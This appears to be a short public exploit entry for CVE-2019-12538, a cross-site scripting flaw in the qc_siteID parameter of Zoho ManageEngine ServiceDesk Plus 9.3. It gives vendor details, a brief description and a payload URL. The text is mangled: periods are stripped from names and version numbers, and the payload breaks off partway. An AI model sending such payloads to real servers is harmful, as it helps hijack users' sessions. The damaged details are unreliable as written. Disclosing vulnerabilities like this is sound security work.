# Exploit Title: Zoho ManageEngine ServiceDesk Plus 93 Cross-Site Scripting via SiteLookupdo
# Date: 2019-06-04
# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
# Vendor Homepage: wwwmanageenginecom/products/service-desk
# Version: Zoho ManageEngine ServiceDesk Plus 93
# CVE : CVE-2019-12538
Information Description: A ...
CVE-2019-12538 Zoho ManageEngine ServiceDesk Plus 93 XSS vulnerability in SiteLookupdo
Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 93 There is XSS via the SiteLookupdo qc_siteID parameter
Author: Concobe of Tarantula Team - VinCSS (a member of Vingroup)
Payload
domain/SiteLookupdo?configID=0&SELECTSITE=qc_siteID"/&a